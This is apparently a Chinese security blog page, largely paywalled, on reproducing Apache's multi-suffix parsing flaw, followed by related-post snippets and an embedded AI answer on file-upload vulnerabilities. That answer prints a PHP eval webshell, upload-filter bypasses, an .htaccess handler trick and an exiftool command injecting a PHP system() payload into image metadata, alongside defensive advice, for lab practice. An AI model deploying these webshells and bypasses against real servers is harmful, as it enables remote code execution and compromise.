Web安全—Apache多后缀解析漏洞复现

最新推荐文章于 2024-07-15 16:28:35 发布
最新推荐文章于 2024-07-15 16:28:35 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: Web容器 Web安全—漏洞学习 文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44431280/article/details/123808465
版权

Web安全—Apache多后缀解析漏洞复现

漏洞产生原理

一:多扩展名解析漏洞
解释:Apache对于解析的文件识别扩展名会从右往左开始解析,当最右边的后缀无法识别(不在/etc/mime.types文件内),则会继续向左识别,直到识别合法后缀才进行解析。
二:Apache配置问题导致解析漏洞
1,Apache的配置文件httpd.conf中存在一行配置:AddHandler application/x-httpd-php .php表示文件名只要包含.php扩展也会被当作php文件执行
**举例:**在网站根目录下创建名称为websec.php.xxx的文件,内容如下:
在这里插入图片描述
Apache配置文件:
在这里插入图片描述

访问websec.php.

了解本专栏 订阅专栏 解锁全文
Apache后缀解析漏洞分析防御方法
09-15
主要介绍了Apache后缀解析漏洞分析防御方法,后缀解析漏洞通常通过伪造PHP后辍,来上传文件到服务器中,很致命的一漏洞,需要的朋友可以参考下
Apache 漏洞后缀解析漏洞
热门推荐
04-28 1万+
我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为windows2003+iis6.0目录解析漏洞。但是大家可能知道的是,apache服务器也存在类似的解析漏洞我们来做下实验,我在本地搭建好了一个apache+php的测试平台两个文件phpinfo.php  ph
Apache后缀解析漏洞复现apache_parsing_vulnerability)
爱吃仡坨的Blog
10-13 2455
apahe解析文件时候有一特性,Apache默认一个文件可以有个以点分割的后缀apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别如果运维人员给.php后缀的文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。该漏洞apache版本php版本无关,属于用户配置当造成的解析漏洞,
vulhub-httpd-apache_parsing_vulnerability
Ronin_qianmo的博客
07-27 488
1漏洞描述 在有后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞2漏洞原理 Apache HTTPD 支持一个文件拥有后缀,并为后缀执行同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文
Apache后缀解析漏洞
qq_43665434的博客
05-10 1673
Apache后缀解析漏洞 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击主机(burp) 192.168.1.120 实验过程 启动环境centos8 # 启动docker service docker start # 切换到vulhub目录 cd /usr/sbin/vulhub/httpd/apache_parsing_vulnerability/ # 创建镜像 docker-compose bulid #
apache漏洞复现-后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 2259
apache漏洞复现-后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
Apache HTTPD 后缀解析漏洞复现(Kali)
Szero
03-28 4494
Apache HTTPD 后缀解析漏洞复现(Kali)
Apache文件解析漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-01 748
使用Docker复现Apache文件解析漏洞1.使用Docker搭建环境1.首先拉取一个基础镜像2.启动一个容器3.进入容器4.更换apt源5.安装web环境6.启动apache7.检查环境是否部署完毕2.漏洞复现3.把Docker容器打包为镜像 1.使用Docker搭建环境 1.首先拉取一个基础镜像 docker pull ubuntu:18.04 2.启动一个容器 docker run -...
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1451
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
Apache HTTPD 后缀解析漏洞复现
记录笔记
04-15 2811
Apache HTTPD 后缀解析漏洞复现 Apache Httpd支持一个文件拥有后缀,同的后缀执行同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞apache版本php版本无关,属于用户配置当造成的解析漏洞 由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有后缀的情况下,只要一个文件含有.php后缀的文件即将被识别
Apache HTTPD 后缀解析漏洞
qq_23003811的博客
07-15 377
Apache HTTPD 支持一个文件拥有后缀,并为后缀执行同的指令。该漏洞apache程序本身的问题,而是管理员配置当造成。重命名为phpinfo.php.png然后上传。1、制作一个phpinfo.php文件内容为。3、获取falg,修改图片代码,然后上传。通过中国蚁剑等工具进行连接。
Apache解析漏洞(一)
weixin_30917213的博客
01-21 262
500是服务器内部错误,说明是有文件的 Apache 漏洞后缀解析漏洞 我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为 windows2003+iis6.0目录解析漏洞。 但是大家可能知道的是,apache服务器也存在类似的解析...
apache-httpd_后缀解析漏洞
acdcccc的博客
09-07 179
Apache Httpd 后缀解析漏洞
Apache漏洞后缀解析漏洞
m0_71287197的博客
07-06 383
500是服务器内部错误,说明是有文件的 Apache 漏洞后缀解析漏洞 我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为 windows2003+iis6.0目录解析漏洞。 但是大家可能知道的是,apache服务器也存在类似的解析漏洞我们来做下实验,我在本地搭建好了一个apache+php的测试平台 两个文件phpinfo.php phpinfo.
Apache[后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现
weixin_45253622的博客
05-09 8299
一、后缀文件解析漏洞 Apache后缀名特性: 如果一个文件有后缀名,那么Apache会从后(右)往前(左)辨别后缀。所以攻击者在可以上传文件的地方上传hack.php.xxx的文件,假设网站有对php的后缀进行过滤,但判断是xxx文件,在黑名单里,安全检查就会放行,然而Apache后缀名特性会以倒数第二个后缀".php"为准,把该文件当做是php文件,解析执行。但是需要把 php5.conf文件中的正则表达式的“$”换成".",然后重启。 总结:Apache文件解析漏洞就是由于用户在
apache httpd 后缀解析漏洞
qq_70303095的博客
01-08 257
apache httpd 后缀解析漏洞
apache后缀文件解析漏洞复现
qq_42499737的博客
07-10 451
文章目录 一. 漏洞描述 二. 漏洞原理 三. 实验环境 apache版本 在网站根目录我们建一个index.php,测试是否解析 修改文件名测试 用文件名包含php的文件测试 漏洞怎么使用? 四. 如何解决 一. 漏洞描述 Apache Httpd支持一个文件拥有后缀,同的后缀执行同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。 该漏洞apache版本php版本无关,属于用户配置
文件上传漏洞复现
最新发布
04-02
<think>嗯,用户想了解如何复现文件上传漏洞进行安全测试,需要详细的技术细节。首先,我得回忆一下文件上传漏洞的基本原理。文件上传漏洞通常是因为Web应用没有对用户上传的文件进行充分的验证,比如文件类型、扩展名、内容等,导致攻击者可以上传恶意文件,比如webshell,进而控制服务器。 接下来,用户需要复现步骤,所以得整理一个具体的流程。可能需要分步骤说明,比如环境搭建、漏洞利用、防护绕过技巧等。还要确保每个步骤都有技术细节,比如使用什么工具,如何构造恶意文件,常见的绕过方法有哪些。 记得用户提到要引用站内的引用内容,引用[1]引用[2]。引用[1]讲的是漏洞复现教学培训,可以用来强调复现的重要性。引用[2]提到FOFA语法,可能寻找存在漏洞的系统有关,但用户的问题更侧重于复现方法,所以可能需要结合如何定位目标,比如使用FOFA搜索特定应用。 然后,复现环境搭建部分,可能建议使用DVWA或者upload-labs这样的漏洞演练平台,这样用户可以在安全的环境下练习。需要详细说明如何配置这些环境,比如使用Docker或者直接安装。 漏洞利用步骤要具体,比如如何上传PHP文件,使用Burp Suite修改请求,绕过前端验证。还要提到同的绕过技巧,比如修改Content-Type、利用双写扩展名、.htaccess文件攻击等,这些都是常见的绕过方法。 技术细节部分可能需要解释服务器如何解析文件,比如Apache解析漏洞,以及如何利用这些漏洞执行恶意代码。还要提到防护措施,比如白名单验证、文件重命名、存储隔离等,这样用户仅知道如何攻击,也了解如何防御。 最后,生成相关问题时,需要考虑用户可能进一步想知道的内容,比如如何检测文件上传漏洞、企业防护的最佳实践、结合其他漏洞的利用案例,以及自动化测试工具的使用。这些问题能帮助用户深入学习应用相关知识。 要确保整个回答结构清晰,步骤明确,技术细节到位,并且自然地融入站内引用,比如在强调复现重要性时引用[1],在提到搜索目标系统时提到引用[2]的FOFA语法。同时,使用正确的中文表达LaTeX格式,比如变量代码块用合适的格式呈现,保持专业性。</think>### 文件上传漏洞复现方法及技术细节 #### 一、漏洞原理 文件上传漏洞产生于Web应用未对用户上传文件的$类型$、$扩展名$、$内容$或$存储路径$进行严格校验,导致攻击者可上传恶意文件(如Webshell)到服务器,进而执行任意代码或控制服务器[^1]。 #### 二、复现环境搭建 1. **推荐环境** - 使用漏洞演练平台:DVWA、upload-labs - 示例Docker部署命令: ```bash docker run -d -p 80:80 vulnerables/web-dvwa ``` 2. **目标系统发现** 通过FOFA语法搜索存在漏洞的应用: ```app="Apache-Tomcat" && country="CN"```[^2] #### 三、漏洞复现步骤 1. **基础攻击流程** - 上传Webshell文件(如PHP): ```php <?php @eval($_POST[&#39;cmd&#39;]);?> ``` - 使用Burp Suite拦截请求,修改`Content-Type`为`image/jpeg` - 上传成功后访问文件路径执行命令:`http://target/upload/shell.php?cmd=whoami` 2. **绕过技巧示例** - **扩展名绕过** 修改文件名:`shell.php.jpg` → 利用Apache解析漏洞(优先解析`.php`) - **Content-Type绕过** 伪造为合法类型:`image/png` - **双写扩展名绕过** 构造文件名:`shell.pphphp` → 过滤后变为`shell.php` - **.htaccess攻击** 上传包含以下内容的`.htaccess`文件: ```apache AddType application/x-httpd-php .test ``` #### 四、技术细节分析 1. **服务器解析漏洞** - IIS 6.0目录路径解析缺陷:`/upload/shell.asp;.jpg`会被解析为ASP文件 - Nginx错误配置导致解析漏洞:`/upload/shell.jpg/xxx.php` 2. **文件内容检测绕过** 使用ExifTool注入PHP代码到图片元数据: ```bash exiftool -Comment=&#39;<?php system($_GET["cmd"]); ?>&#39; image.jpg ``` #### 五、防护建议 1. 文件类型验证采用$MIME$类型白名单 2. 文件存储路径与Web根目录隔离 3. 使用随机文件名+后缀白名单(如`$filename = md5(uniqid()).".jpg";`) 4. 部署WAF规则检测恶意载荷(如`<\?php`正则匹配)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值